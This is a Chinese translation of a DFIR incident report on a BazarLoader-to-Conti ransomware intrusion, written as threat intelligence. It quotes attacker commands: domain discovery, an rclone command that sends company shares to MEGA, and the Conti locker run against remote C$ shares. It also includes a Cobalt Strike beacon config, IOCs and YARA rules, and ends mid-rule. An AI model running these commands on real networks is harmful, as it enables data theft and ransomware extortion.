譯者:知道創宇404實驗室翻譯組
原文鏈接:https://thedfirreport.com/2021/11/29/continuing-the-bazar-ransomware-story/
在本報告中,我們將討論8月初的一個案例,在這個案例中,我們發現攻擊者利用 BazarLoader 和 Cobalt Strike 并使用 Conti 勒索軟件加密系統。
該案例中使用了常規的發現工具列表,如 AdFind、 Net、 Ping、 PowerView 和 Nltest。利用 Rclone 技術將公司數據轉移給 Mega,利用 Process Hacker 技術轉移 LSASS。攻擊者在服務器上執行一個 Conti 批處理文件,然后服務器對大部分域加密。
摘要
八月份,我們發現了一起由BazarLoader 感染開始的入侵事件。傳遞來源可能是一場網絡釣魚運動,該運動向受害者分發有密碼保護的 zip 文件和改裝化文件。word文檔中的宏提取并執行了惡意的.HTA文檔,該文檔下載并加載了內存中的BazarLoader DLL。
對信息安全界有一個認知是很明顯的,即從BazarLoader開始的入侵常常以Conti勒索軟件結束。本次事件也得出了這樣的結論。在涉及Conti勒索軟件的事件中有一些明顯的相似之處。勒索軟件操作者的工具和執行的總體目的在整個集群中趨于匹配。當我們看我們之前的Conti 事件,這一點變得顯而易見。這可能是由于一家分支機構泄露的Conti手冊廣泛傳播。在本例中,我們看到了相同的事件模式,工具包括net、nltest、用于discovery的ShareFinder、用于C2的Cobalt Strike 和WMIC遠程進程創建,以便擴展其在網絡中的訪問。
盡管入侵總共持續了五天,但就在入侵的頭兩個小時,Cobalt Strike和鍵盤操作者出現了。他們立即開始收集信息,使用網絡命令了解情形。然后,他們繼續通過執行PowerView模塊Invoke-ShareFinder來查找打開的共享。
在收集和分析ShareFinder的結果后,他們似乎對組織的服務器和工作站布局有了很好的了解,因為他們開始執行命令從特定的高價值服務器收集信息。在此期間,當執行者未能更改特定參數時,我們發現了錯誤,這些參數說明執行者根據預定義的playbook進行操作。他們最終決定使用WMIC橫向轉向服務器以執行DLL。
一旦他們通過Cobalt Strike信標訪問了遠程服務器,他們就會重新運行Invoke ShareFinder,然后通過MEGA cloud storage service使用Rclone應用程序從不同的服務器中過濾出有價值的數據.
第二天,攻擊者使用RDP訪問備份服務器,并在訪問過程中通過taskmanager GUI查看備份設置和運行服務器上的進程。
第四天,攻擊者再次使用Rclone和MEGA進行另一輪過濾。
第五天,他們迅速向最終目標邁進,那就是Conti勒索軟件。在執行Conti之前,他們使用RDP安裝和配置AnyDesk遠程桌面應用程序。由于具有GUI訪問權限,他們試圖使用ProcessHacker投放LSASS進程。在這最后一步之后,他們通過批處理腳本將Conti勒索軟件部署到所有加入域的系統中。
關于這個事件的一個有趣的事情是,我們沒有發現攻擊者與域控制器(DC)交互。但一般來說,大多數勒索軟件事件都涉及到攻擊者在DCs上執行代碼。
時間線
由 @Kostastsale, @pigerlin, and @_pete_0 完成分析和報告,由@TheDFIRReport 進行審查。
MITRE ATT&CK
初始訪問
感謝 @James_inthe_box 提供樣本。
與以前記錄的入侵一樣,攻擊者使用內嵌的Microsoft Word文檔引誘用戶啟用宏來執行有效負載。用戶會看到以下信息:
查看文件時,我們可以看到標記為.doc文件的文件類型在查看文件屬性時顯示為XML。
更深入的檢查顯示Word 2003 XML格式和包含的宏。
啟用宏后,在下一階段,將創建一個HTML應用程序(HTA)文件并將其放入用戶文件夾:
對HTA文件的分析顯示了編碼HTML和JavaScript/VBScript代碼的混合,更不用說文件開頭的褻瀆了。
隨后執行HTA:
對HTA文件的分析顯示了編碼HTML和JavaScript/VBScript代碼的混合。
base64編碼字符串可以解碼為:
代碼將偽裝成jpg的二進制文件(compareFor.jpg)從millscruelg[.]com下載到文件夾“c:\users\public”,并結合VBScript代碼,利用REGSVR32執行此DLL。
這將啟動與64.227.65[.]60:443的連接,并調用Svchost.exe,然后查找myexternalip[.]com以檢索網絡的外部面向公眾的IPv4地址。攻擊者可以使用此信息驗證目標網絡和加強工具配置。通過RunDll32并使用Svchost進程加載了兩個DLL。第一個是D574.dll:
之后是 D8B3.dll:
D8B3.dll注入Winlogon進程(高完整性):
在D8B3.dll中,dll被編譯。
這兩個DLL都有無效證書,可以以任何失敗/已吊銷狀態被檢測到:
此外,每個DLL都沒有與DLL相關的填充元數據:
進程層次結構樹圖如下所示:
這與8月11日布拉德·鄧肯對Bazarloader的分析非常相似。
持久性
我們發現在文件夾c:\users\
AnyDesk是一個封閉源代碼的遠程桌面應用程序,可用于多種操作系統。它是免費供私人使用的。我們發現了AnyDesk應用程序向合法注冊的IPv4范圍發起的長連接。然而,在這些環節中,我們沒有太有價值的發現。
憑證訪問
ProcessHacker也被放在C:\的根目錄中,可能用于訪問LSASS進程。對于用戶來說,他們并不常常使用ProcessHacker之類的實用程序,位于C:\root的應用程序在某些環境中也是可疑的。
發現
通過使用RunDLL32和Winlogon進程,我們發現了許多典型的主機和網絡發現命令,這些命令使用了net, nltest, tasklist and time等技術。例子包括:
tasklist /s <REDACTED>
net group "domain admins" /dom
net localgroup "administrator"
nltest /domain_trusts /all_trusts
net view /all /domain
net view /all time
ping在運行其中一些命令時,出現了復制粘貼錯誤,表明操作者可能從運行手冊上操作的,如8月份泄漏的Conti手冊一樣,在出現錯誤之后,可以通過 tasklist/s IP 而不是實際的主機系統 IP 看到。
Cmd.exe進程使用不常見的父進程(如 RunDLL32.exe)調用了許多命令。
下面的例子使用 time 命令:
Red Canary為 rundll32提供了一個很好的檢測指南; 本文涵蓋了 rundll32的活動,例如命令減少、不尋常的繁殖活動等。
發現命令調用:
AdFind 通過二進制文件寫入,但還沒有發現執行的跡象。
文件共享枚舉是使用PowerShell Invoke-ShareFinder 腳本(PowerView的一部分)實現的。
輸出文件是在c:\ProgramData\found\u shares.txt創建的。在最近的其他入侵中也觀察到了該工具的使用。PowerShell由WinLogon進程調用,結果文件由Rundll32.exe創建。
在入侵的第二天,攻擊者通過RDP和Cobalt Strike信標訪問備份服務器,并打開其服務器上的備份控制臺。
查看備份后,他們還通過GUI打開taskmanager(由流程命令行中的/4指示)查看系統上正在運行的進程。
橫向運動
攻擊者在網絡中的關鍵資產(此次入侵中的備份主機)上執行Cobalt Strike信標,使用以下命令 :
通過 WMI 調用 rundll32在目標主機上加載143.dll (Cobalt Strike 信標)實現遠程進程執行:
The Cobalt Strike 信標 (143.dll) 注入到svchost進程‘svchost.exe -k UnistackSvcGroup -s CDPUserSvc’:
然后請求checkauj[.]com (82.117.252.143)。大約9小時后,攻擊者通過143.dll 建立了 RDP 會話。這是在入侵之前實現的,我們將這些行為聯系起來:
在這一事件中,我們認為攻擊者泄露了遠程工作站的名稱“win-344vu98d3ru”。
命令和控制
偽裝成 jpg 的 Bazar DLL 在整個入侵過程中都使用了 HTTPS C2。
Bazar C2
64.227.65.60:4439
JA3:72a589da586844d7f0818ce684948eea
JA3s:ec74a5c51106f0419184d0dd08fb05bc
Certificate: [7f:d6:df:4d:5e:c4:d9:71:c0:46:8d:47:e5:81:75:57:d6:92:72:96 ]
Not Before: 2021/08/03 07:37:28 UTC
Not After: 2022/08/03 07:37:28 UTC
Issuer Org: GG EST
Subject Common: perdefue.fr
Subject Org: GG EST
Public Algorithm: rsaEncryption161.35.147.110:443
JA3:72a589da586844d7f0818ce684948eea
JA3s:ec74a5c51106f0419184d0dd08fb05bc
Certificate: [21:ff:9f:e0:8a:dd:c3:ed:36:90:a0:e1:11:70:fe:c4:b3:42:f5:1a ]
Not Before: 2021/08/03 07:37:30 UTC
Not After: 2022/08/03 07:37:30 UTC
Issuer Org: GG EST
Subject Common: perdefue.fr
Subject Org: GG EST
Public Algorithm: rsaEncryption161.35.155.92:443
JA3:72a589da586844d7f0818ce684948eea
JA3s:ec74a5c51106f0419184d0dd08fb05bc
Certificate: [42:7d:a4:48:5b:6b:2b:92:2c:07:9d:cc:59:14:2e:de:b1:e8:f5:bb ]
Not Before: 2021/08/03 07:37:30 UTC
Not After: 2022/08/03 07:37:30 UTC
Issuer Org: GG EST
Subject Common: perdefue.fr
Subject Org: GG EST
Public Algorithm: rsaEncryption64.227.69.92:443
JA3:72a589da586844d7f0818ce684948eea
JA3s:ec74a5c51106f0419184d0dd08fb05bc
Certificate: [97:33:eb:80:85:ae:f0:0e:40:94:ac:d5:38:96:6a:e5:75:2b:49:8c ]
Not Before: 2021/08/03 07:37:28 UTC
Not After: 2022/08/03 07:37:28 UTC
Issuer Org: GG EST
Subject Common: perdefue.fr
Subject Org: GG EST
Public Algorithm: rsaEncryptionCobalt Strike
第一個 DLL [ D574.DLL ]沒有進行任何立即的后續活動,而 D8B3.dll 由 rundll32加載,并參與許多攻擊活動,從文件創建、進程執行到與82.117.252[.]143:443持久網絡連接,整個入侵過程都有它的身影。
D574.dll 由 rundll32進程加載,具有對 volga.azureedge [ . ] net的持久 DNS 查詢行為,但沒有建立網絡連接。
我們發現,DLL 有效負載“ d574.DLL”通過 DNS 9003響應代碼與域 volga.azureedge [ . ]和 c2服務器建立聯系。
外部沙盒顯示,該域綁定到其他Cobalt Strike信標樣本,但那些樣本與此報告沒有關聯,它很可能是這次服務器已經取消了。
https://tria.ge/210803-w15fxk72ns
https://capesandbox.com/analysis/175977/
D8B3.dll 顯示了初始活動,然后是已建立的與82.117.252[ . ]143:80的網絡連接。
D8B3.dll 是攻擊者在整個入侵過程中使用的 Cobalt Strike 信標。它作為主要的有效載荷,有利于大部分初始入侵和正在進行的維護訪問行為。用于從灘頭主機橫向移動到備份服務器的 DLL 143.DLL 也與這個 Cobalt Strike 服務器通信。一旦攻擊者獲得了一個立足點并橫向移動,他們就能夠使用 RDP 并訪問有價值的特定主機。
-
five.azureedge.net 82.117.252.143:80
-
checkauj.com 82.117.252.143:443
JA3: a0e9f5d64349fb13191bc781f81f42e1
JA3s: ae4edc6faf64d08308082ad26be60767
Certificate: [68:c5:fc:c0:4a:34:e4:8f:01:86:59:c1:da:40:78:00:00:20:a0:b0 ]
Not Before: 2021/08/03 11:50:47 UTC
Not After: 2021/11/01 11:50:45 UTC
Issuer Org: Let's Encrypt
Subject Common: checkauj.com [checkauj.com ,www.checkauj.com ]
Public Algorithmrsa:EncryptionCobalt Strike 配置
82.117.252.143 – checkauj.com
{
"BeaconType": [
"HTTP"
],
"Port": 80,
"SleepTime": 60000,
"MaxGetSize": 1403644,
"Jitter": 37,
"C2Server": "checkauj.com,/jquery-3.3.1.min.js",
"HttpPostUri": "/jquery-3.3.2.min.js",
"Malleable_C2_Instructions": [
"Remove 1522 bytes from the end",
"Remove 84 bytes from the beginning",
"Remove 3931 bytes from the beginning",
"Base64 URL-safe decode",
"XOR mask w/ random key"
],
"SpawnTo": "AAAAAAAAAAAAAAAAAAAAAA==",
"HttpGet_Verb": "GET",
"HttpPost_Verb": "POST",
"HttpPostChunk": 0,
"Spawnto_x86": "%windir%\\syswow64\\rundll32.exe",
"Spawnto_x64": "%windir%\\sysnative\\rundll32.exe",
"CryptoScheme": 0,
"Proxy_Behavior": "Use IE settings",
"Watermark": 0,
"bStageCleanup": "True",
"bCFGCaution": "False",
"KillDate": 0,
"bProcInject_StartRWX": "True",
"bProcInject_UseRWX": "False",
"bProcInject_MinAllocSize": 17500,
"ProcInject_PrependAppend_x86": [
"kJA=",
"Empty"
],
"ProcInject_PrependAppend_x64": [
"kJA=",
"Empty"
],
"ProcInject_Execute": [
"CreateThread",
"SetThreadContext",
"CreateRemoteThread",
"RtlCreateUserThread"
],
"ProcInject_AllocationMethod": "VirtualAllocEx",
"bUsesCookies": "True",
"HostHeader": ""}滲出
一旦攻擊者建立了對關鍵資產的訪問權限,他們就使用 RClone 將敏感數據轉移到一個名為 MEGA 的云存儲空間。Rclone 使用的完整命令包括各種參數,包括設置帶寬限制。
rclone.exe copy --max-age 2y "\\SERVER\Shares" Mega:DATA -q --ignore-existing --auto-confirm --multi-thread-streams 7 --transfers 7 --bwlimit 10MRClone 仍然是大容量數據外泄的常用且有效的工具。NCC 集團已經提供了一份關于 Rclone 應用和檢測方法的詳細報道。
在兩個獨立的事件中都發現了 Rclone 的存在,每次持續約三小時。
影響
在第五天,攻擊者采取他們的最終行動——加密域。他們首先通過一個交互式命令 shell 在網絡上對系統進行 ping。在這個階段, Iobit unlocker也被植入了,但是它沒有被使用。在 ping 了系統之后,攻擊者打開了一個批處理文件,這個文件最終被用來啟動 Conti 勒索軟件。
locker.bat是一個定制的腳本,用于在多個主機上對文件進行加密:
根據文件的內容,我們有理由認為攻擊者可能在得到ping 結果后,在執勒索軟件之前做了最后的調整。
然后通過備份服務器發射勒索軟件。
為了加密系統,勒索軟件為每個目標主機安裝了 C$dir,然后執行其加密例程。
C:\o4IRWsH4N1a3hjO9Sy2rPP02oyUddH7zA5xGih0ESmlhiiXD9kpWVCPfOwUnayZp_locker.exe -m -net -size 10 -nomutex -p \\TARGETHOST\C$以下是執行過程的概述:
對DLL和指示Conti工件的EXE的分析:
加密完成后,以下勒索軟件注釋將作為“readme.txt”放在所有受影響的目錄中
這些text文件的內容:
在執行locker勒索軟件后,攻擊者隨后針對多臺主機執行了一個文件列表發現,似乎是在驗證和評估locker加密是否成功:
IOCs
Network
BazarLoader 64.227.69.92|443 161.35.155.92|443 161.35.147.110|443 64.227.65.60|443
Loader download millscruelg.com(ZoomEye搜索結果) 45.95.11.133|80
Cobalt Strike volga.azureedge.net five.azureedge.net checkauj.com 82.117.252.143|443 82.117.252.143|80
Files
decree-08.03.2021.doc
f6f72e3d91f7b53dd75e347889a793da
5d4f020115a483e9e5aa9778c038466f9014c90c
14bccfecaaec8353e3e8f090ec1d3e9c87eb8ceb2a7abedfc47c3c980da8ad71
compareForFor.hta
193b84d45dd371c6e4a501333d37349b
742ed8d0202aafba1c162537087a8a131cb85cde
fb38061bf601001c45aafe8d0c5feaa22c607d2ff79cfb841788519ca55a17b4
D8B3.dll
4ba6791f2293a8bc2dfa537015829b3c
d4f5cc55b6fa25f9a45ba7e968438b97e33aefbc
4a49cf7539f9fd5cc066dc493bf16598a38a75f7b656224db1ddd33005ad76f6
D574.dll
663c8d0fe8b770b50792d10f6c07a652
d0361fbcebe59205b2ea6a31041c89464a5e61b6
1872bf6c974e9b11040851f7d30e5326afdc8b13802891c222af4368a14f829c
143.dll
ab3a744545a12ba2f6789e94b789666a
1d5f8d283ed3f6019954aa480182c9913ee49735
6f844a6e903aa8e305e88ac0f60328c184f71a4bfbe93124981d6a4308b14610
ProcessHacker.exe
68f9b52895f4d34e74112f3129b3b00d
c5e2018bf7c0f314fed4fd7fe7e69fa2e648359e
d4a0fe56316a2c45b9ba9ac1005363309a3edc7acf9e4df64d326a0ff273e80f
locker.bat
84361813423910294079d0bc5b6daba2
c0b28fd2d5b62d5129225e8c45d368bc9e9fd415
1edfae602f195d53b63707fe117e9c47e1925722533be43909a5d594e1ef63d3
o4IRWsH4N1a3hjO9Sy2rPP02oyUddH7zA5xGih0ESmlhiiXD9kpWVCPfOwUnayZp_locker.exe
7f112bfa16a6bd344aaed28abf606780
eaa792a1c9f1d277af3d88bd9ea17a33275308f3
9cd3c0cff6f3ecb31c7d6bc531395ccfd374bcd257c3c463ac528703ae2b0219
o4IRWsH4N1a3hjO9Sy2rPP02oyUddH7zA5xGih0ESmlhiiXD9kpWVCPfOwUnayZp_locker_x64.dll
2c313c5b532c905eb8f1748a0d656ff9
70725329e4c14b39d49db349f3c84e055c111f2d
31656dcea4da01879e80dff59a1af60ca09c951fe5fc7e291be611c4eadd932a
o4IRWsH4N1a3hjO9Sy2rPP02oyUddH7zA5xGih0ESmlhiiXD9kpWVCPfOwUnayZp_locker_x86.dll
26bd89afd5c1ba9803422d33185cef89
c99f0fa8d5fbffe5288aaff84dbe980c412ba34e
01a9549c015cfcbff4a830cea7df6386dc5474fd433f15a6944b834551a2b4c9
AnyDesk.exe
e6c3ab2ee9a613efdf995043b140fd8e
33738cf695a6ac03675fe925d62ecb529ac73d03
8f09c538fc587b882eecd9cfb869c363581c2c646d8c32a2f7c1ff3763dcb4e7
unlocker.exe
5840aa36b70b7c03c25e5e1266c5835b
ea031940b2120551a6abbe125eb0536b9e4f14c8
09d7fcbf95e66b242ff5d7bc76e4d2c912462c8c344cb2b90070a38d27aaef53
rclone.exe
9066cfcf809bb19091509a4d0f15f092
f88a948b0fd137d4b14cf5aec0c08066cb07e08d
9b5d1f6a94ce122671a5956b2016e879428c74964174739b68397b6384f6ee8bSuricata
ET TROJAN Cobalt Strike Malleable C2 JQuery Custom Profile Response
ETPRO TROJAN Cobalt Strike Malleable C2 JQuery Custom Profile M2
ET POLICY SSL/TLS Certificate Observed (AnyDesk Remote Desktop Software)
ET USER_AGENTS AnyDesk Remote Desktop Software User-Agent
ET POLICY HTTP POST to MEGA Userstorage Sigma
rclone_execution.yaml
sysmon_in_memory_powershell.yml
win_susp_wmic_proc_create_rundll32.yml
sysmon_abusing_debug_privilege.yml
win_trust_discovery.yml
win_office_shell.yml
win_mshta_spawn_shell.yml
win_susp_net_execution.yml
win_susp_regsvr32_anomalies.yml
sysmon_rundll32_net_connections.yml
win_net_enum.yml
win_susp_wmi_execution.ymlYara
/*
YARA Rule Set
Author: TheDFIRReport
Date: 2021-11-29
Identifier: 5794
*/
/* Rule Set ----------------------------------------------------------------- */
rule mal_host2_143 {
meta:
description = "mal - file 143.dll"
author = "TheDFIRReport"
date = "2021-11-29"
hash1 = "6f844a6e903aa8e305e88ac0f60328c184f71a4bfbe93124981d6a4308b14610"
strings:
$x1 = "object is remotepacer: H_m_prev=reflect mismatchremote I/O errorruntime: g: g=runtime: addr = runtime: base = runtime: gp: gp=" ascii
$x2 = "slice bounds out of range [:%x] with length %ystopTheWorld: not stopped (status != _Pgcstop)sysGrow bounds not aligned to palloc" ascii
$x3 = " to unallocated spanCertOpenSystemStoreWCreateProcessAsUserWCryptAcquireContextWGetAcceptExSockaddrsGetCurrentDirectoryWGetFileA" ascii
$x4 = "Go pointer stored into non-Go memoryUnable to determine system directoryaccessing a corrupted shared libraryruntime: VirtualQuer" ascii
$x5 = "GetAddrInfoWGetLastErrorGetLengthSidGetStdHandleGetTempPathWLoadLibraryWReadConsoleWSetEndOfFileTransmitFileabi mismatchadvapi32" ascii
$x6 = "lock: lock countslice bounds out of rangesocket type not supportedstartm: p has runnable gsstoplockedm: not runnableunexpected f" ascii
$x7 = "unknown pcws2_32.dll of size (targetpc= KiB work, freeindex= gcwaiting= heap_live= idleprocs= in status mallocing= ms clock" ascii
$x8 = "file descriptor in bad statefindrunnable: netpoll with pfound pointer to free objectgcBgMarkWorker: mode not setgcstopm: negativ" ascii
$x9 = ".lib section in a.out corruptedbad write barrier buffer boundscall from within the Go runtimecannot assign requested addresscasg" ascii
$x10 = "Ptrmask.lockentersyscallblockexec format errorg already scannedglobalAlloc.mutexlocked m0 woke upmark - bad statusmarkBits overf" ascii
$x11 = "entersyscallgcBitsArenasgcpacertracehost is downillegal seekinvalid slotiphlpapi.dllkernel32.dlllfstack.pushmadvdontneedmheapSpe" ascii
$x12 = "ollectionidentifier removedindex out of rangeinput/output errormultihop attemptedno child processesno locks availableoperation c" ascii
$s13 = "y failed; errno=runtime: bad notifyList size - sync=runtime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierrunt" ascii
$s14 = "ddetailsecur32.dllshell32.dlltracealloc(unreachableuserenv.dll KiB total, [recovered] allocCount found at *( gcscandone m->gs" ascii
$s15 = ".dllbad flushGenbad g statusbad g0 stackbad recoverycan't happencas64 failedchan receivedumping heapend tracegc" fullword ascii
$s16 = "ked to threadCommandLineToArgvWCreateFileMappingWGetExitCodeProcessGetFileAttributesWLookupAccountNameWRFS specific errorSetFile" ascii
$s17 = "mstartbad sequence numberdevice not a streamdirectory not emptydisk quota exceededdodeltimer: wrong Pfile already closedfile alr" ascii
$s18 = "structure needs cleaning bytes failed with errno= to unused region of spanGODEBUG: can not enable \"GetQueuedCompletionStatus_cg" ascii
$s19 = "garbage collection scangcDrain phase incorrectindex out of range [%x]interrupted system callinvalid m->lockedInt = left over mar" ascii
$s20 = "tProcessIdGetSystemDirectoryWGetTokenInformationWaitForSingleObjectadjusttimers: bad pbad file descriptorbad notifyList sizebad " ascii
condition:
uint16(0) == 0x5a4d and filesize < 4000KB and
1 of ($x*) and all of them
}
rule mal_host1_D8B3 {
meta:
description = "mal - file D8B3.dll"
author = "TheDFIRReport"
date = "2021-11-29"
hash1 = "4a49cf7539f9fd5cc066dc493bf16598a38a75f7b656224db1ddd33005ad76f6"
strings:
$x1 = "object is remotepacer: H_m_prev=reflect mismatchremote I/O errorruntime: g: g=runtime: addr = runtime: base = runtime: gp: gp=" ascii
$x2 = "slice bounds out of range [:%x] with length %ystopTheWorld: not stopped (status != _Pgcstop)sysGrow bounds not aligned to palloc" ascii
$x3 = " to unallocated spanCertOpenSystemStoreWCreateProcessAsUserWCryptAcquireContextWGetAcceptExSockaddrsGetCurrentDirectoryWGetFileA" ascii
$x4 = "Go pointer stored into non-Go memoryUnable to determine system directoryaccessing a corrupted shared libraryruntime: VirtualQuer" ascii
$x5 = "GetAddrInfoWGetLastErrorGetLengthSidGetStdHandleGetTempPathWLoadLibraryWReadConsoleWSetEndOfFileTransmitFileabi mismatchadvapi32" ascii
$x6 = "lock: lock countslice bounds out of rangesocket type not supportedstartm: p has runnable gsstoplockedm: not runnableunexpected f" ascii
$x7 = "unknown pcws2_32.dll of size (targetpc= KiB work, freeindex= gcwaiting= heap_live= idleprocs= in status mallocing= ms clock" ascii
$x8 = "file descriptor in bad statefindrunnable: netpoll with pfound pointer to free objectgcBgMarkWorker: mode not setgcstopm: negativ" ascii
$x9 = ".lib section in a.out corruptedbad write barrier buffer boundscall from within the Go runtimecannot assign requested addresscasg" ascii
$x10 = "Ptrmask.lockentersyscallblockexec format errorg already scannedglobalAlloc.mutexlocked m0 woke upmark - bad statusmarkBits overf" ascii
$x11 = "entersyscallgcBitsArenasgcpacertracehost is downillegal seekinvalid slotiphlpapi.dllkernel32.dlllfstack.pushmadvdontneedmheapSpe" ascii
$x12 = "ollectionidentifier removedindex out of rangeinput/output errormultihop attemptedno child processesno locks availableoperation c" ascii
$s13 = "y failed; errno=runtime: bad notifyList size - sync=runtime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierrunt" ascii
$s14 = "ddetailsecur32.dllshell32.dlltracealloc(unreachableuserenv.dll KiB total, [recovered] allocCount found at *( gcscandone m->gs" ascii
$s15 = ".dllbad flushGenbad g statusbad g0 stackbad recoverycan't happencas64 failedchan receivedumping heapend tracegc" fullword ascii
$s16 = "ked to threadCommandLineToArgvWCreateFileMappingWGetExitCodeProcessGetFileAttributesWLookupAccountNameWRFS specific errorSetFile" ascii
$s17 = "mstartbad sequence numberdevice not a streamdirectory not emptydisk quota exceededdodeltimer: wrong Pfile already closedfile alr" ascii
$s18 = "structure needs cleaning bytes failed with errno= to unused region of spanGODEBUG: can not enable \"GetQueuedCompletionStatus_cg" ascii
$s19 = "garbage collection scangcDrain phase incorrectindex out of range [%x]interrupted system callinvalid m->lockedInt = left over mar" ascii
$s20 = "tProcessIdGetSystemDirectoryWGetTokenInformationWaitForSingleObjectadjusttimers: bad pbad file descriptorbad notifyList sizebad " ascii
condition:
uint16(0) == 0x5a4d and filesize < 4000KB and
1 of ($x*) and all of them
}
rule mal_host2_AnyDesk {
meta:
description = "mal - file AnyDesk.exe"
author = "TheDFIRReport"
date = "2021-11-29"
hash1 = "8f09c538fc587b882eecd9cfb869c363581c2c646d8c32a2f7c1ff3763dcb4e7"
strings:
$x1 = "<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" pu" ascii
$x2 = "C:\\Buildbot\\ad-windows-32\\build\\release\\app-32\\win_loader\\AnyDesk.pdb" fullword ascii
$s3 = "<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" pu" ascii
$s4 = "<assemblyIdentity version=\"6.3.2.0\" processorArchitecture=\"x86\" name=\"AnyDesk.AnyDesk.AnyDesk\" type=\"win32\" />" fullword ascii
$s5 = "4http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O" fullword ascii
$s6 = "(Symantec SHA256 TimeStamping Signer - G3" fullword ascii
$s7 = "(Symantec SHA256 TimeStamping Signer - G30" fullword ascii
$s8 = "http://ocsp.digicert.com0N" fullword ascii
$s9 = "http://www.digicert.com/CPS0" fullword ascii
$s10 = "Bhttp://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0" fullword ascii
$s11 = "<description>AnyDesk screen sharing and remote control software.</description>" fullword ascii
$s12 = "/http://crl3.digicert.com/sha2-assured-cs-g1.crl05" fullword ascii
$s13 = "/http://crl4.digicert.com/sha2-assured-cs-g1.crl0L" fullword ascii
$s14 = "%jgmRhZl%" fullword ascii
$s15 = "5ZW:\"Wfh" fullword ascii
$s16 = "5HRe:\\" fullword ascii
$s17 = "ysN.JTf" fullword ascii
$s18 = "Z72.irZ" fullword ascii
$s19 = "Ve:\\-Sj7" fullword ascii
$s20 = "ekX.cFm" fullword ascii
condition:
uint16(0) == 0x5a4d and filesize < 11000KB and
1 of ($x*) and 4 of them
}
rule ProcessHacker {
meta:
description = "mal - file ProcessHacker.exe"
author = "TheDFIRReport"
date = "2021-11-29"
hash1 = "d4a0fe56316a2c45b9ba9ac1005363309a3edc7acf9e4df64d326a0ff273e80f"
strings:
$x1 = "Software\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\taskmgr.exe" fullword wide
$x2 = "D:\\Projects\\processhacker2\\bin\\Release32\\ProcessHacker.pdb" fullword ascii
$x3 = "ProcessHacker.exe" fullword wide
$x4 = "kprocesshacker.sys" fullword wide
$x5 = "ntdll.dll!NtDelayExecution" fullword wide
$x6 = "ntdll.dll!ZwDelayExecution" fullword wide
$s7 = "PhInjectDllProcess" fullword ascii
$s8 = "_PhUiInjectDllProcess@8" fullword ascii
$s9 = "logonui.exe" fullword wide
$s10 = "Executable files (*.exe;*.dll;*.ocx;*.sys;*.scr;*.cpl)" fullword wide
$s11 = "\\x86\\ProcessHacker.exe" fullword wide
$s12 = "user32.dll!NtUserGetMessage" fullword wide
$s13 = "ntdll.dll!NtWaitForKeyedEvent" fullword wide
$s14 = "ntdll.dll!ZwWaitForKeyedEvent" fullword wide
$s15 = "ntdll.dll!NtReleaseKeyedEvent" fullword wide
$s16 = "ntdll.dll!ZwReleaseKeyedEvent" fullword wide
$s17 = "\\kprocesshacker.sys" fullword wide
$s18 = "\\SystemRoot\\system32\\drivers\\ntfs.sys" fullword wide
$s19 = "_PhExecuteRunAsCommand2@36" fullword ascii
$s20 = "_PhShellExecuteUserString@20" fullword ascii
condition:
uint16(0) == 0x5a4d and filesize < 4000KB and
1 of ($x*) and 4 of them
}
rule unlocker {
meta:
description = "mal - file unlocker.exe"
author = "TheDFIRReport"
date = "2021-11-29"
hash1 = "09d7fcbf95e66b242ff5d7bc76e4d2c912462c8c344cb2b90070a38d27aaef53"
strings:
$s1 = "For more detailed information, please visit http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdline" fullword wide
$s2 = "(Symantec SHA256 TimeStamping Signer - G20" fullword ascii
$s3 = " <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"/>" fullword ascii
$s4 = "(Symantec SHA256 TimeStamping Signer - G2" fullword ascii
$s5 = "Causes Setup to create a log file in the user's TEMP directory." fullword wide
$s6 = "Prevents the user from cancelling during the installation process." fullword wide
$s7 = "Same as /LOG, except it allows you to specify a fixed path/filename to use for the log file." fullword wide
$s8 = " <dpiAware xmlns=\"http://schemas.microsoft.com/SMI/2005/WindowsSettings\">true</dpiAware>" fullword ascii
$s9 = "The Setup program accepts optional command line parameters." fullword wide
$s10 = "Instructs Setup to load the settings from the specified file after having checked the command line." fullword wide
$s11 = "Overrides the default component settings." fullword wide
$s12 = "/MERGETASKS=\"comma separated list of task names\"" fullword wide
$s13 = "/PASSWORD=password" fullword wide
$s14 = "Specifies the password to use." fullword wide
$s15 = "yyyyvvvvvvvvvxxw" fullword ascii
$s16 = "yyyyyyrrrsy" fullword ascii
$s17 = " processorArchitecture=\"x86\"" fullword ascii
$s18 = " processorArchitecture=\"x86\"" fullword ascii
$s19 = "Prevents Setup from restarting the system following a successful installation, or after a Preparing to Install failure that requ" wide
$s20 = "/DIR=\"x:\\dirname\"" fullword wide
condition:
uint16(0) == 0x5a4d and filesize < 7000KB and
8 of them
}
rule mal_host2_locker {
meta:
description = "mal - file locker.bat"
author = "TheDFIRReport"
date = "2021-11-29"
hash1 = "1edfae602f195d53b63707fe117e9c47e1925722533be43909a5d594e1ef63d3"
strings:
$x1 = "_locker.exe -m -net -size 10 -nomutex -p" ascii
condition:
uint16(0) == 0x7473 and filesize < 8KB and
$x1
}
import "pe"
rule o4IRWsH4N1a3hjO9Sy2rPP02oyUddH7zA5xGih0ESmlhiiXD9kpWVCPfOwUnayZp_locker {
meta:
description = "conti - file o4IRWsH4N1a3hjO9Sy2rPP02oyUddH7zA5xGih0ESmlhiiXD9kpWVCPfOwUnayZp_locker.exe"
author = "The DFIR Report"
reference = "https://thedfirreport.com"
date = "2021-11-29"
hash1 = "9cd3c0cff6f3ecb31c7d6bc531395ccfd374bcd257c3c463ac528703ae2b0219"
strings:
$s1 = "AppPolicyGetProcessTerminationMethod" fullword ascii
$s2 = "operator co_await" fullword ascii
$s3 = ">*>6>A>_>" fullword ascii /* hex encoded string 'j' */
$s4 = "api-ms-win-appmodel-runtime-l1-1-2" fullword wide
$s5 = "Bapi-ms-win-core-fibers-l1-1-1" fullword wide
$s6 = "SVWjEhQ" fullword ascii
$s7 = ";F;[;l;" fullword ascii /* Goodware String - occured 1 times */
$s8 = "74787@7H7P7T7\\7p7" fullword ascii /* Goodware String - occured 1 times */
